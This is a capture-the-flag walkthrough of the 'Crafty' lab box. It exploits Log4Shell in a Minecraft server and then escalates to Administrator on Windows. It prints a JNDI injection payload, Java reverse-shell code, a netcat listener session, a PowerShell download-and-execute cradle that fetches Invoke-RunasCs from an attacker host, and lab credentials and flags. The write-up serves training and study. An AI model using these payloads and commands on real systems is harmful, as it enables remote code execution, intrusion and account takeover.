Crafty (Easy)

Fuck this box's initial foothold actual fucking caner

Using CLI

Minecraft Console Client v1.20.2 - for MC 1.4.6 to 1.20.2 - Github.com/MCCTeam
GitHub build 245, built on 2024-01-30 from commit 1e60b61
Login :
Password(invisible): 
You chose to run in offline mode.
Server IP : <BOX IP HERE>
Retrieving Server Info...
Server version : 1.16.5 (protocol v754)
[MCC] Version is supported.
Logging in...
[MCC] Server is in offline mode.
[MCC] Server was successfully joined.
Type '/quit' to leave the server.
>

Editing payload

public class Exploit {

    public Exploit() throws Exception {
        String host="%s";
        int port=%d;
        String cmd="cmd.exe";
        Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
        Socket s=new Socket(host,port);
        InputStream pi=p.getInputStream(),

Launching PoC

kali@kali ~/log4j-shell-poc (main)> python3 poc.py --userip 10.10.15.64 --webport 8000 --lport 9002

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Exploit java class created success
[+] Setting up LDAP server

[+] Send me: ${jndi:ldap://10.10.15.64:1389/a}
[+] Starting Webserver on port 8000 http://0.0.0.0:8000

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Listening on 0.0.0.0:1389

put poc payload in the CLI ${jndi:ldap://10.10.15.64:1389/a}

Minecraft Console Client v1.20.2 - for MC 1.4.6 to 1.20.2 - Github.com/MCCTeam
GitHub build 245, built on 2024-01-30 from commit 1e60b61
Login :
Password(invisible): 
You chose to run in offline mode.
Server IP : <BOX IP HERE>
Retrieving Server Info...
Server version : 1.16.5 (protocol v754)
[MCC] Version is supported.
Logging in...
[MCC] Server is in offline mode.
[MCC] Server was successfully joined.
Type '/quit' to leave the server.
> ${jndi:ldap://10.10.15.64:1389/a}

Welcome to fish, the friendly interactive shell
Type help for instructions on how to use fish
kali@kali ~> nc -nvlp 9002
listening on [any] 9002 ...
connect to [10.10.15.64] from (UNKNOWN) [10.129.226.255] 49681
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\users\svc_minecraft\server>

now we have a shell!! so lets get the user flag :))

c:\users\svc_minecraft\server>type C:\Users\svc_minecraft\Desktop\user.txt
type C:\Users\svc_minecraft\Desktop\user.txt
69a793c0da2bcbe6376d458d0adf8ecf

lets see what else svc_minecraft has in his directory

c:\Users\svc_minecraft>tree /f /a
tree /f /a
Folder PATH listing
Volume serial number is C419-63F6
C:.
+---3D Objects
+---Contacts
+---Desktop
|       user.txt
|       
+---Documents
+---Downloads
+---Favorites
|   |   Bing.url
|   |   
|   \---Links
+---Links
|       Desktop.lnk
|       Downloads.lnk
|       
+---Music
+---Pictures
+---Saved Games
+---Searches
+---server
|   |   banned-ips.json
|   |   banned-players.json
|   |   eula.txt
|   |   ops.json
|   |   server.jar
|   |   server.properties
|   |   usercache.json
|   |   whitelist.json
|   |   
|   +---logs
|   |       2023-10-24-1.log.gz
|   |       2023-10-24-2.log.gz
|   |       2023-10-24-3.log.gz
|   |       2023-10-24-4.log.gz
|   |       2023-10-26-1.log.gz
|   |       2023-10-28-1.log.gz
|   |       2023-10-28-2.log.gz
|   |       2023-11-14-1.log.gz
|   |       2023-11-14-2.log.gz
|   |       2023-11-14-3.log.gz
|   |       2023-11-14-4.log.gz
|   |       2023-11-21-1.log.gz
|   |       2023-11-21-2.log.gz
|   |       2023-11-21-3.log.gz
|   |       2023-11-21-4.log.gz
|   |       2023-11-22-1.log.gz
|   |       2023-11-22-2.log.gz
|   |       2023-11-22-3.log.gz
|   |       2024-02-05-1.log.gz
|   |       2024-02-05-2.log.gz
|   |       2024-02-05-3.log.gz
|   |       2024-02-05-4.log.gz
|   |       2024-02-05-5.log.gz
|   |       2024-02-06-1.log.gz
|   |       2024-02-06-2.log.gz
|   |       2024-02-06-3.log.gz
|   |       latest.log
|   |       
|   +---plugins
|   |       playercounter-1.0-SNAPSHOT.jar  <------------- SUS?
|   |       
|   \---world
|       |   level.dat
|       |   level.dat_old
|       |   session.lock
|       |   
|       +---data
|       |       raids.dat
|       |       
|       +---datapacks
|       +---DIM-1
|       |   \---data
|       |           raids.dat
|       |           
|       +---DIM1
|       |   \---data
|       |           raids_end.dat
|       |           
|       +---playerdata
|       +---poi
|       |       r.-1.-1.mca
|       |       r.-1.0.mca
|       |       r.0.-1.mca
|       |       r.0.0.mca
|       |       
|       \---region
|               r.-1.-1.mca
|               r.-1.0.mca
|               r.0.-1.mca
|               r.0.0.mca
|               r.1.-1.mca
|               r.1.0.mca
|               
\---Videos

my idea was to download the plugin thats alone because its what popped out the most to me, so im going to assume you downloaded the file too and lets see whats inside

kali@kali ~/Downloads> java -jar jd-gui-1.6.6.jar
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

lets download the jd-gui

Ofcourse the s67u84zKq8IXw to be very important so I wanted to open the class

so we have established a credential s67u84zKq8IXw so, lets try and priv esc. now here i got stuck and didnt know how to escelate, ofcourse one of my first ideas was to find the su equivalent which is runas in this case itll be RunAsCs which our dear gracious enzu informed me about https://github.com/antonioCoco/RunasCs

iex(new-object net.webclient).downloadstring("http://10.10.14.6:8000/Invoke-RunasCs.ps1");

in my case i decided to use Invoke-RunasCs.ps1

Invoke-RunasCs tstark playboy69 "cmd /c whoami" Invoke-RunasCs tstark playboy69 "cmd /c dir"

c:\tmp>powershell
powershell
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\tmp> iex(new-object net.webclient).downloadstring("http://10.10.15.64:1337/Invoke-RunasCs.ps1");
iex(new-object net.webclient).downloadstring("http://10.10.15.64:1337/Invoke-RunasCs.ps1");
PS C:\tmp> Invoke-RunasCs Administrator s67u84zKq8IXw "cmd /c whoami /all"
Invoke-RunasCs Administrator s67u84zKq8IXw "cmd /c whoami /all"


USER INFORMATION
----------------

User Name            SID                                          
==================== =============================================
crafty\administrator S-1-5-21-4088429403-1159899800-2753317549-500


GROUP INFORMATION
-----------------

Group Name                                                    Type             SID          Attributes                                                     
============================================================= ================ ============ ===============================================================
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group             
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Remote Management Users                               Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group             
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\INTERACTIVE                                      Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group             
CONSOLE LOGON                                                 Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group             
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group             
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288                                                                


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State   
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Disabled
SeSystemtimePrivilege                     Change the system time                                             Disabled
SeProfileSingleProcessPrivilege           Profile single process                                             Disabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Disabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Disabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Disabled
SeDebugPrivilege                          Debug programs                                                     Disabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled 
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Disabled
SeUndockPrivilege                         Remove computer from docking station                               Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Disabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled 
SeCreateGlobalPrivilege                   Create global objects                                              Enabled 
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
SeTimeZonePrivilege                       Change the time zone                                               Disabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled

PS C:\tmp> Invoke-RunasCs Administrator s67u84zKq8IXw "cmd /c type C:\Users\Administrator\Desktop\root.txt"
Invoke-RunasCs Administrator s67u84zKq8IXw "cmd /c type C:\Users\Administrator\Desktop\root.txt"

02744bc6d6d4ba02605ab420aa9015b8

PreviousBastion (easy)NextMETACTF

Last updated 1 year ago

hashtagUsing CLI

hashtagEditing payload

hashtagLaunching PoC

Using CLI

Editing payload

Launching PoC